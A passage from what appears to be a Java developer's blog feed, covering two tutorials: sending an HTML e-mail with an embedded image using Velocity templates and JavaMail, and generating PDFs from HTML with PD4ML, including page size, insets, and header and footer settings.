of the Code</h2>
<h3 id="sendmessage.java">SendMessage.java</h3>
<p><strong>Velocity Template Merging</strong></p>
<ul>
<li>The best practice for storing the non-variables such as the SMTP
connect parameters, the template names etc., either in a properties file
or in a constants interface. In this example, a properties file, “mail.
properties” has been used. Using the ClassLoader the properties file is
loaded</li>
</ul>
<div class="sourceCode" id="cb5"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a> <span class="bu">Properties</span> props <span class="op">=</span> <span class="kw">new</span> <span class="bu">Properties</span><span class="op">();</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a> props<span class="op">.</span><span class="fu">load</span><span class="op">(</span>SendMessage<span class="op">.</span><span class="fu">class</span><span class="op">.</span><span class="fu">getClassLoader</span><span class="op">().</span><span class="fu">getResourceAsStream</span><span class="op">(</span><span class="st">"mail.properties"</span><span class="op">));</span></span></code></pre></div>
<ul>
<li>The Mail.vm template is loaded from into the Velocity context using
the static method Velocity.getTemplate</li>
</ul>
<div class="sourceCode" id="cb6"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb6-1"><a aria-hidden="true" href="#cb6-1" tabindex="-1"></a> Template template <span class="op">=</span> Velocity<span class="op">.</span><span class="fu">getTemplate</span><span class="op">(</span><span class="st">"Mail.vm"</span><span class="op">);</span></span>
<span id="cb6-2"><a aria-hidden="true" href="#cb6-2" tabindex="-1"></a> VelocityContext context <span class="op">=</span> <span class="kw">new</span> <span class="fu">VelocityContext</span><span class="op">();</span></span></code></pre></div>
<ul>
<li>Then the user defined MailBean is placed in the velocity Context
under the name “MailBean”</li>
</ul>
<div class="sourceCode" id="cb7"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb7-1"><a aria-hidden="true" href="#cb7-1" tabindex="-1"></a> context<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"MailBean"</span> <span class="op">,</span> mailBean<span class="op">);</span></span></code></pre></div>
<ul>
<li>Along with beans, we can place name value pairs directly in the
velocity context</li>
</ul>
<div class="sourceCode" id="cb8"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb8-1"><a aria-hidden="true" href="#cb8-1" tabindex="-1"></a> <span class="bu">String</span> host <span class="op">=</span> props<span class="op">.</span><span class="fu">getProperty</span><span class="op">(</span><span class="st">"hostname"</span><span class="op">);</span></span>
<span id="cb8-2"><a aria-hidden="true" href="#cb8-2" tabindex="-1"></a> context<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"host"</span><span class="op">,</span> host<span class="op">);</span></span>
<span id="cb8-3"><a aria-hidden="true" href="#cb8-3" tabindex="-1"></a> context<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"imgName"</span><span class="op">,</span> <span class="st">"smile.gif"</span><span class="op">);</span></span>
<span id="cb8-4"><a aria-hidden="true" href="#cb8-4" tabindex="-1"></a> context<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"context"</span><span class="op">,</span> <span class="st">"myApp"</span><span class="op">);</span></span></code></pre></div>
<ul>
<li>When the context is merged with the template and the results in
placed in a StringWriter Object</li>
</ul>
<div class="sourceCode" id="cb9"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb9-1"><a aria-hidden="true" href="#cb9-1" tabindex="-1"></a> <span class="bu">StringWriter</span> message <span class="op">=</span> <span class="kw">new</span> <span class="bu">StringWriter</span><span class="op">();</span></span>
<span id="cb9-2"><a aria-hidden="true" href="#cb9-2" tabindex="-1"></a> template<span class="op">.</span><span class="fu">merge</span><span class="op">(</span>context<span class="op">,</span> message<span class="op">);</span></span></code></pre></div>
<p><strong>JAVA Mail - E-Mail Creation</strong></p>
<ul>
<li>The SMTP Host variable is placed in the System Properties and the
javax.mail.Session is obtained for the given SMTP Host</li>
</ul>
<div class="sourceCode" id="cb10"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb10-1"><a aria-hidden="true" href="#cb10-1" tabindex="-1"></a> <span class="bu">Properties</span> sysProperties <span class="op">=</span> <span class="bu">System</span><span class="op">.</span><span class="fu">getProperties</span><span class="op">();</span></span>
<span id="cb10-2"><a aria-hidden="true" href="#cb10-2" tabindex="-1"></a> sysProperties<span class="op">.</span><span class="fu">put</span><span class="op">(</span><span class="st">"mail.smtp.host"</span><span class="op">,</span> props<span class="op">.</span><span class="fu">getProperty</span><span class="op">(</span><span class="st">"smtpHost"</span><span class="op">));</span></span>
<span id="cb10-3"><a aria-hidden="true" href="#cb10-3" tabindex="-1"></a> Session session <span class="op">=</span> Session<span class="op">.</span><span class="fu">getInstance</span><span class="op">(</span>sysProperties<span class="op">,</span> <span class="kw">null</span><span class="op">);</span></span></code></pre></div>
<ul>
<li><p>Since the e-mail needs to contain text and an image file, create
a MimeMultipart with the subtype declared as “related’ so that the image
being put doesnt get lost if the images are blocked by the recipient</p>
<pre><code> MimeMultipart multipart = new MimeMultipart("related");</code></pre></li>
</ul>
<p><strong>For adding the image to the e-mail</strong></p>
<ul>
<li>Create a body part for storing the image and embedding into the
e-mail</li>
</ul>
<div class="sourceCode" id="cb12"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb12-1"><a aria-hidden="true" href="#cb12-1" tabindex="-1"></a> BodyPart imageBodyPart <span class="op">=</span> <span class="kw">new</span> <span class="fu">MimeBodyPart</span><span class="op">();</span></span></code></pre></div>
<ul>
<li>Use the FileDataSource to read the image from the Web deployment
folder. Note: <em>Using File.seperator takes care of the Windows/Unix
environment issue</em></li>
</ul>
<div class="sourceCode" id="cb13"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb13-1"><a aria-hidden="true" href="#cb13-1" tabindex="-1"></a> <span class="bu">StringBuffer</span> imgPath <span class="op">=</span> <span class="kw">new</span> <span class="bu">StringBuffer</span><span class="op">().</span><span class="fu">append</span><span class="op">(</span><span class="bu">File</span><span class="op">.</span><span class="fu">separator</span><span class="op">).</span><span class="fu">append</span><span class="op">(</span><span class="st">"applications"</span><span class="op">).</span><span class="fu">append</span><span class="op">(</span><span class="bu">File</span><span class="op">.</span><span class="fu">separator</span><span class="op">).</span><span class="fu">append</span><span class="op">(</span><span class="st">"mailheader.GIF"</span><span class="op">);</span></span></code></pre></div>
<ul>
<li>Then using the DataHandler object place the image into the BodyPart
created</li>
</ul>
<div class="sourceCode" id="cb14"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb14-1"><a aria-hidden="true" href="#cb14-1" tabindex="-1"></a> <span class="bu">DataSource</span> fds <span class="op">=</span> <span class="kw">new</span> <span class="bu">FileDataSource</span><span class="op">(</span>imgPath<span class="op">.</span><span class="fu">toString</span><span class="op">());</span></span>
<span id="cb14-2"><a aria-hidden="true" href="#cb14-2" tabindex="-1"></a> imageBodyPart<span class="op">.</span><span class="fu">setDataHandler</span><span class="op">(</span><span class="kw">new</span> <span class="bu">DataHandler</span><span class="op">(</span>fds<span class="op">));</span></span></code></pre></div>
<ul>
<li>Set an id for the image body part so that the image can be accessed
anywhere in the mail for embedding</li>
</ul>
<div class="sourceCode" id="cb15"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb15-1"><a aria-hidden="true" href="#cb15-1" tabindex="-1"></a> imageBodyPart<span class="op">.</span><span class="fu">setHeader</span><span class="op">(</span><span class="st">"Content-ID"</span><span class="op">,</span><span class="st">"<123>"</span><span class="op">);</span></span></code></pre></div>
<ul>
<li>Add the Image Body Part into the MimeMultiPart object</li>
</ul>
<div class="sourceCode" id="cb16"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb16-1"><a aria-hidden="true" href="#cb16-1" tabindex="-1"></a> multipart<span class="op">.</span><span class="fu">addBodyPart</span><span class="op">(</span>imageBodyPart<span class="op">);</span></span></code></pre></div>
<p><strong>Adding the Message body content to the e-mail</strong></p>
<ul>
<li>Create a body part for storing the message content in the
e-mail</li>
</ul>
<div class="sourceCode" id="cb17"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb17-1"><a aria-hidden="true" href="#cb17-1" tabindex="-1"></a> BodyPart messageBodyPart <span class="op">=</span> <span class="kw">new</span> <span class="fu">MimeBodyPart</span><span class="op">();</span></span></code></pre></div>
<ul>
<li>Combine the StringWriter Object and the image src code using a
StringBuffer</li>
</ul>
<div class="sourceCode" id="cb18"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb18-1"><a aria-hidden="true" href="#cb18-1" tabindex="-1"></a> <span class="bu">StringBuffer</span> messageBuffer <span class="op">=</span> <span class="kw">new</span> <span class="bu">StringBuffer</span><span class="op">();</span></span>
<span id="cb18-2"><a aria-hidden="true" href="#cb18-2" tabindex="-1"></a> messageBuffer<span class="op">.</span><span class="fu">append</span><span class="op">(</span>message<span class="op">.</span><span class="fu">toString</span><span class="op">());</span></span>
<span id="cb18-3"><a aria-hidden="true" href="#cb18-3" tabindex="-1"></a> messageBuffer<span class="op">.</span><span class="fu">append</span><span class="op">(</span><span class="st">"<img src="</span>cid<span class="op">:</span><span class="dv">123</span>\<span class="st">">"</span><span class="op">);</span></span></code></pre></div>
<ul>
<li>Set the Message content type as <em>text/html</em>, since our
template VM is designed using HTML and add the message body part to the
main MultiMime part</li>
</ul>
<div class="sourceCode" id="cb19"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb19-1"><a aria-hidden="true" href="#cb19-1" tabindex="-1"></a> messageBodyPart<span class="op">.</span><span class="fu">setContent</span><span class="op">(</span>messageBuffer<span class="op">.</span><span class="fu">toString</span><span class="op">(),</span> <span class="st">"text/html"</span><span class="op">);</span></span>
<span id="cb19-2"><a aria-hidden="true" href="#cb19-2" tabindex="-1"></a> multipart<span class="op">.</span><span class="fu">addBodyPart</span><span class="op">(</span>messageBodyPart<span class="op">);</span></span></code></pre></div>
<p><strong>Sending the E-Mail</strong></p>
<ul>
<li>Create a MimeMessage using the javax.mail.Session Object</li>
</ul>
<div class="sourceCode" id="cb20"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb20-1"><a aria-hidden="true" href="#cb20-1" tabindex="-1"></a> Message msg <span class="op">=</span> <span class="kw">new</span> <span class="fu">MimeMessage</span><span class="op">(</span>session<span class="op">);</span></span></code></pre></div>
<ul>
<li>Set the content as the multimime part object created</li>
</ul>
<div class="sourceCode" id="cb21"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb21-1"><a aria-hidden="true" href="#cb21-1" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">setContent</span><span class="op">(</span>multipart<span class="op">);</span></span></code></pre></div>
<ul>
<li>The Recipients are added to the e-mail for the recipient types TO,
CC and BCC</li>
</ul>
<div class="sourceCode" id="cb22"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb22-1"><a aria-hidden="true" href="#cb22-1" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">addRecipients</span><span class="op">(</span>Message<span class="op">.</span><span class="fu">RecipientType</span><span class="op">.</span><span class="fu">TO</span><span class="op">,</span> InternetAddress<span class="op">.</span><span class="fu">parse</span><span class="op">(</span><span class="st">"someone@example.com"</span><span class="op">));</span></span>
<span id="cb22-2"><a aria-hidden="true" href="#cb22-2" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">addRecipients</span><span class="op">(</span>Message<span class="op">.</span><span class="fu">RecipientType</span><span class="op">.</span><span class="fu">CC</span><span class="op">,</span>InternetAddress<span class="op">.</span><span class="fu">parse</span><span class="op">(</span><span class="st">"everyone@example.com"</span><span class="op">));</span></span>
<span id="cb22-3"><a aria-hidden="true" href="#cb22-3" tabindex="-1"></a> <span class="cf">if</span><span class="op">((</span><span class="kw">null</span><span class="op">!=</span>recipientsList<span class="op">)&&(!</span>recipientsList<span class="op">.</span><span class="fu">isEmpty</span><span class="op">())){</span></span>
<span id="cb22-4"><a aria-hidden="true" href="#cb22-4" tabindex="-1"></a> <span class="cf">for</span><span class="op">(</span><span class="dt">int</span> i<span class="op">=</span><span class="dv">0</span><span class="op">;</span>i<span class="op"><</span>recipientsList<span class="op">.</span><span class="fu">size</span><span class="op">();</span>i<span class="op">++){</span></span>
<span id="cb22-5"><a aria-hidden="true" href="#cb22-5" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">addRecipients</span><span class="op">(</span>Message<span class="op">.</span><span class="fu">RecipientType</span><span class="op">.</span><span class="fu">BCC</span><span class="op">,</span>InternetAddress<span class="op">.</span><span class="fu">parse</span><span class="op">(</span>recipientsList<span class="op">.</span><span class="fu">get</span><span class="op">(</span>i<span class="op">)));</span></span>
<span id="cb22-6"><a aria-hidden="true" href="#cb22-6" tabindex="-1"></a> <span class="op">}</span></span>
<span id="cb22-7"><a aria-hidden="true" href="#cb22-7" tabindex="-1"></a> <span class="op">}</span></span></code></pre></div>
<ul>
<li>The Subject Text, Sent Date and the From Address are set as
below.</li>
</ul>
<div class="sourceCode" id="cb23"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb23-1"><a aria-hidden="true" href="#cb23-1" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">setSubject</span><span class="op">(</span>subject<span class="op">);</span></span>
<span id="cb23-2"><a aria-hidden="true" href="#cb23-2" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">setSentDate</span><span class="op">(</span><span class="kw">new</span> <span class="bu">Date</span><span class="op">());</span></span>
<span id="cb23-3"><a aria-hidden="true" href="#cb23-3" tabindex="-1"></a> msg<span class="op">.</span><span class="fu">setFrom</span><span class="op">(</span><span class="kw">new</span> <span class="fu">InternetAddress</span><span class="op">(</span><span class="st">"dummy@example.com"</span><span class="op">));</span></span></code></pre></div>
<ul>
<li>The Transport Object is used for creating the connection to the SMTP
host and sending the e-mail. The transporter object below is obtained
using the getTransport method and by giving the parameter as
<em>smtp</em> as the protocol for the Transport Object</li>
</ul>
<div class="sourceCode" id="cb24"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb24-1"><a aria-hidden="true" href="#cb24-1" tabindex="-1"></a> Transport transport <span class="op">=</span> session<span class="op">.</span><span class="fu">getTransport</span><span class="op">(</span><span class="st">"smtp"</span><span class="op">);</span></span></code></pre></div>
<ul>
<li>Then the Transport is connected using the HOST, UserName and
Password parameters from the properties file</li>
</ul>
<div class="sourceCode" id="cb25"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb25-1"><a aria-hidden="true" href="#cb25-1" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">connect</span><span class="op">(</span>props<span class="op">.</span><span class="fu">getProperty</span><span class="op">(</span><span class="st">"connectHost"</span><span class="op">);</span></span>
<span id="cb25-2"><a aria-hidden="true" href="#cb25-2" tabindex="-1"></a> props<span class="op">.</span><span class="fu">getProperty</span><span class="op">(</span><span class="st">"connectUser"</span><span class="op">);</span></span>
<span id="cb25-3"><a aria-hidden="true" href="#cb25-3" tabindex="-1"></a> props<span class="op">.</span><span class="fu">getProperty</span><span class="op">(</span><span class="st">"connectPassword"</span><span class="op">);</span></span></code></pre></div>
<ul>
<li>Then the e-mail is sent using the sendMessage to all the
recipients</li>
</ul>
<div class="sourceCode" id="cb26"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb26-1"><a aria-hidden="true" href="#cb26-1" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">sendMessage</span><span class="op">(</span>msg<span class="op">,</span>msg<span class="op">.</span><span class="fu">getAllRecipients</span><span class="op">());</span></span></code></pre></div>
<ul>
<li>The transport is closed to mark the end of the connection</li>
</ul>
<div class="sourceCode" id="cb27"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb27-1"><a aria-hidden="true" href="#cb27-1" tabindex="-1"></a> transport<span class="op">.</span><span class="fu">close</span><span class="op">();</span></span></code></pre></div>
<h4 id="mail.vm">Mail.vm</h4>
<p><strong>Image Path Macro</strong></p>
<p>This macro is used to return the path to be used as SRC by the images
in the HTML. It takes a parameter imgName and returns the string,</p>
<pre><code> https://$host/$context/images/$imgName</code></pre>
<p>where $host, $context are context variables placed by the JAVA
code</p>
<p>The macro looks like this</p>
<pre><code> #macro( IMGURL $imgName )
https://$host/$context/images/$imgName
#end</code></pre>
<p>Example:</p>
<pre><code> <img src="#IMGURL('mailheader.GIF')" border="0" width="980" height="61"></code></pre>
<p>This will get generated as:</p>
<pre><code> <img src="https://localhost/myapp/images/mailheader.GIF" border="0" width="980" height="61"></code></pre>
<p><strong>Accessing the Bean Object</strong></p>
<p>The variables in the MailBean object placed in the context can be
accessed using, <code>$MailBean.\[variable-name\]</code> Example:
<code>Mail Content : $MailBean.content</code></p>
<h4 id="mail.properties">mail.properties</h4>
<p>This file contains the connection and the other context parameter
properties used by the java code</p>
<h3 id="advantages">Advantages</h3>
<p>Designed as an easy-to-use general templating tool, Velocity is
useful in any Java application area that requires data formatting and
presentation. Their salient advantages being:</p>
<ul>
<li>It adapts to many application areas.</li>
<li>It offers a simple, clear syntax for the template designer.</li>
<li>It offers a simple programming model for the developer.</li>
<li>Because templates and code are separate, you can develop and
maintain them independently.</li>
<li>The Velocity engine easily integrates into any Java application
environment, especially Servlets.</li>
<li>Velocity enables templates to access any public method of data
objects in the context.</li>
</ul>
<h4 id="references">References</h4>
<ul>
<li><a class="uri" href="http://velocity.apache.org/">http://velocity.apache.org/</a></li>
<li><a class="uri" href="http://www.roseindia.net/software-tutorials/detail/3131">http://www.roseindia.net/software-tutorials/detail/3131</a></li>
<li><a class="uri" href="http://java.sun.com/developer/">http://java.sun.com/developer/</a></li>
<li><a class="uri" href="http://kickjava.com/2876.htm">http://kickjava.com/2876.htm</a></li>
<li><a class="uri" href="http://www.javaworld.com/javaworld/jw-12-2001/jw-1228-velocity.html">http://www.javaworld.com/javaworld/jw-12-2001/jw-1228-velocity.html</a></li>
<li><a class="uri" href="http://velocity.apache.org/engine/releases/velocity-1.5/user-guide.html">http://velocity.apache.org/engine/releases/velocity-1.5/user-guide.html</a></li>
<li><a class="uri" href="http://www.javasoft.com/products/javamail">http://www.javasoft.com/products/javamail</a></li>
</ul>PDF Generation using PD4ML2010-04-05T00:00:00-07:002010-04-05T00:00:00-07:00Senthilkumar Gopaltag:sengopal.github.io,2010-04-05:/posts/pdf-generation-using-pd4ml.htmlOur Project required PDF generation at various stages of the application and the uploading the same into the FileNet FTP. PD4ML was used for generation and saving the file locally into the server from which the PDF got generated to the FileNet.<h3 id="project-usage">Project Usage</h3>
<p>Our project required PDF generation at various stages of the
application and the uploading the same into the FileNet FTP. PD4ML was
used for generation and saving the file locally into the server from
which the PDF got generated to the FileNet. PD4ML was used as our
application used Struts framework and the data needed in the PDF was
provided using STRUTS and the layout design was done using HTML and CSS.
This provided us with a seamless abstraction between the presentation
and the business layer for dynamic generation of PDFs online.</p>
<h3 id="introduction-to-pd4ml">Introduction to PD4ML</h3>
<p>PD4ML is a powerful PDF generating tool that uses HTML and CSS
(Cascading Style Sheets) as page layout and content definition format.
Written in 100% pure Java, it allows users to easily add PDF generation
functionality to end products. PD4ML can be used either as a command
line operation or in Web applications for online PDF generation from
HTML and JSP templates.</p>
<p>###PD4ML as a Command Line Operation PD4ML can be used for HTML to
PDF transformation with a command line application. There are man ways
for achieving this conversion. However the most commonly used methods
are as follows:</p>
<p>####Creating a PDF from an URL String The PDF can be generated using
a html file whose URL can be in the render () method</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a><span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">zefer</span><span class="op">.</span><span class="im">pd4ml</span><span class="op">.</span><span class="im">PD4ML</span><span class="op">;</span></span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a><span class="kw">import</span> <span class="im">org</span><span class="op">.</span><span class="im">zefer</span><span class="op">.</span><span class="im">pd4ml</span><span class="op">.</span><span class="im">PD4Constants</span><span class="op">;</span></span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a><span class="kw">......</span><span class="op">..</span></span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a></span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a><span class="fu">File</span> f <span class="op">=</span> <span class="kw">new</span> <span class="bu">File</span><span class="op">(</span><span class="st">"D:/tools/test.pdf"</span><span class="op">);</span></span>
<span id="cb1-6"><a aria-hidden="true" href="#cb1-6" tabindex="-1"></a>java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileOutputStream</span> fos <span class="op">=</span> <span class="kw">new</span> java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileOutputStream</span><span class="op">(</span>f<span class="op">);</span></span>
<span id="cb1-7"><a aria-hidden="true" href="#cb1-7" tabindex="-1"></a>PD4ML pd4ml <span class="op">=</span> <span class="kw">new</span> <span class="fu">PD4ML</span><span class="op">();</span></span>
<span id="cb1-8"><a aria-hidden="true" href="#cb1-8" tabindex="-1"></a>pd4ml<span class="op">.</span><span class="fu">render</span><span class="op">(</span> urlstring<span class="op">,</span> fos <span class="op">);</span></span></code></pre></div>
<p><strong>Steps Involved</strong></p>
<ol type="1">
<li>Import the PD4ML converter class</li>
<li>Define HTML-to-PDF converting parameter values if needed such as
user space width, HTML elements arrangement, vertical size etc.,</li>
<li>Preparing output stream for PDF generation.</li>
<li>Instantiating PD4ML converter.</li>
<li>Passing to it HTML-to-PDF converting parameters.</li>
<li>Performing HTML-to-PDF translation.</li>
</ol>
<p><strong>Converting HTML obtained from input stream to
PDF</strong></p>
<p>Using an URL for converting an HTML into a PDF is not mandatory.
PD4ML can read a source HTML from input stream and then use the input
stream for conversion into the PDF</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a><span class="bu">File</span> f <span class="op">=</span> <span class="kw">new</span> <span class="bu">File</span><span class="op">(</span><span class="st">"D:/tools/test.pdf"</span><span class="op">);</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a>java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileOutputStream</span> fos <span class="op">=</span> <span class="kw">new</span> java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileOutputStream</span><span class="op">(</span>f<span class="op">);</span></span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a><span class="bu">File</span> fz <span class="op">=</span> <span class="kw">new</span> <span class="bu">File</span><span class="op">(</span><span class="st">"D:/tools/yahoo.htm"</span><span class="op">);</span></span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a>java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileInputStream</span> fis <span class="op">=</span> <span class="kw">new</span> java<span class="op">.</span><span class="fu">io</span><span class="op">.</span><span class="fu">FileInputStream</span><span class="op">(</span>fz<span class="op">);</span></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a><span class="bu">InputStreamReader</span> isr <span class="op">=</span> <span class="kw">new</span> <span class="bu">InputStreamReader</span><span class="op">(</span> fis<span class="op">,</span> <span class="st">"UTF-8"</span> <span class="op">);</span></span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a>PD4ML html <span class="op">=</span> <span class="kw">new</span> <span class="fu">PD4ML</span><span class="op">();</span></span>
<span id="cb2-7"><a aria-hidden="true" href="#cb2-7" tabindex="-1"></a><span class="bu">URL</span> base <span class="op">=</span> <span class="kw">new</span> <span class="bu">URL</span><span class="op">(</span> <span class="st">"file:D:/tools/"</span> <span class="op">);</span></span>
<span id="cb2-8"><a aria-hidden="true" href="#cb2-8" tabindex="-1"></a>html<span class="op">.</span><span class="fu">render</span><span class="op">(</span> isr<span class="op">,</span> fos<span class="op">,</span> base <span class="op">);</span></span></code></pre></div>
<h3 id="formatting-the-pdf-document-generated">Formatting the PDF
document generated</h3>
<p>The PDF getting generated can be formatted using various methods.
Some of the most commonly used ones are given below:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a>PD4ML html <span class="op">=</span> <span class="kw">new</span> <span class="fu">PD4ML</span><span class="op">();</span></span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a>html<span class="op">.</span><span class="fu">setPageSize</span><span class="op">(</span> <span class="kw">new</span> <span class="bu">Dimension</span><span class="op">(</span><span class="dv">450</span><span class="op">,</span> <span class="dv">450</span><span class="op">)</span> <span class="op">);</span></span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a><span class="co">//defines page size in points. A set of predefined page format constants is available in the PD4Constants interface.</span></span>
<span id="cb3-4"><a aria-hidden="true" href="#cb3-4" tabindex="-1"></a>html<span class="op">.</span><span class="fu">setPageInsets</span><span class="op">(</span> <span class="kw">new</span> <span class="bu">Insets</span><span class="op">(</span><span class="dv">20</span><span class="op">,</span> <span class="dv">50</span><span class="op">,</span> <span class="dv">10</span><span class="op">,</span> <span class="dv">10</span><span class="op">)</span> <span class="op">);</span></span>
<span id="cb3-5"><a aria-hidden="true" href="#cb3-5" tabindex="-1"></a><span class="co">//specifies page insets in points</span></span>
<span id="cb3-6"><a aria-hidden="true" href="#cb3-6" tabindex="-1"></a>html<span class="op">.</span><span class="fu">setHtmlWidth</span><span class="op">(</span> <span class="dv">750</span> <span class="op">);</span></span>
<span id="cb3-7"><a aria-hidden="true" href="#cb3-7" tabindex="-1"></a><span class="co">//defines desired HTML page width in screen pixels. Virtually it can be seen as a web browser window horizontal resize</span></span>
<span id="cb3-8"><a aria-hidden="true" href="#cb3-8" tabindex="-1"></a>html<span class="op">.</span><span class="fu">enableImgSplit</span><span class="op">(</span> <span class="kw">false</span> <span class="op">);</span></span>
<span id="cb3-9"><a aria-hidden="true" href="#cb3-9" tabindex="-1"></a><span class="co">//allows to disable image splitting by page breaks. By default the option is true (splitting enabled).</span></span></code></pre></div>
<h4 id="for-generating-text-only-header-and-footer">For Generating
Text-Only Header and Footer</h4>
<p>Static or template text can be used for header and footer of the PDF
document. The header and the footer can be set with various formats. Few
of them are:</p>
<div class="sourceCode" id="cb4"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a>PD4PageMark header <span class="op">=</span> <span class="kw">new</span> <span class="fu">PD4PageMark</span><span class="op">();</span></span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a>header<span class="op">.</span><span class="fu">setAreaHeight</span><span class="op">(</span> <span class="dv">20</span> <span class="op">);</span></span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a><span class="co">//defines height of the header or footer area</span></span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a>header<span class="op">.</span><span class="fu">setTitleTemplate</span><span class="op">(</span> <span class="st">"title: $[title]"</span> <span class="op">);</span></span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a><span class="co">//defines a template for page title representation.</span></span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a><span class="co">//No title is printed, if the titleTemplate is set to null. Default value is null.</span></span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a>header<span class="op">.</span><span class="fu">setTitleAlignment</span><span class="op">(</span> PD4PageMark<span class="op">.</span><span class="fu">CENTER_ALIGN</span> <span class="op">);</span></span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a><span class="co">//defines alignment for the page title string in the document's header of footer</span></span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a>header<span class="op">.</span><span class="fu">setPageNumberAlignment</span><span class="op">(</span> PD4PageMark<span class="op">.</span><span class="fu">LEFT_ALIGN</span> <span class="op">);</span></span>
<span id="cb4-10"><a aria-hidden="true" href="#cb4-10" tabindex="-1"></a><span class="co">//defines alignment for the page numbers in the document's header of footer area</span></span>
<span id="cb4-11"><a aria-hidden="true" href="#cb4-11" tabindex="-1"></a>header<span class="op">.</span><span class="fu">setPageNumberTemplate</span><span class="op">(</span> <span class="st">"#$[page]"</span> <span class="op">);</span></span>
<span id="cb4-12"><a aria-hidden="true" href="#cb4-12" tabindex="-1"></a><span class="co">//defines a template for page number representation</span></span>
<span id="cb4-13"><a aria-hidden="true" href="#cb4-13" tabindex="-1"></a>PD4PageMark footer <span class="op">=</span> <span class="kw">new</span> <span class="fu">PD4PageMark</span><span class="op">();</span></span>
<span id="cb4-14"><a aria-hidden="true" href="#cb4-14" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setAreaHeight</span><span class="op">(</span> <span class="dv">30</span> <span class="op">);</span></span>
<span id="cb4-15"><a aria-hidden="true" href="#cb4-15" tabindex="-1"></a><span class="co">//Already explained above</span></span>
<span id="cb4-16"><a aria-hidden="true" href="#cb4-16" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setFontSize</span><span class="op">(</span> <span class="dv">20</span> <span class="op">);</span></span>
<span id="cb4-17"><a aria-hidden="true" href="#cb4-17" tabindex="-1"></a><span class="co">//sets font size for the header or footer</span></span>
<span id="cb4-18"><a aria-hidden="true" href="#cb4-18" tabindex="-1"></a>footer<span class="op">.</span><span class="fu">setColor</span><span class="op">(</span> <span class="bu">Color</span><span class="op">.</span><span class="fu">red</span> <span class="op">);</span></span>
<span id="cb4-19"><a aria-hidden="true" href="#cb4-19" tabindex="-1"></a><span class="co">//setColor() sets the color of header or footer text</span></span>
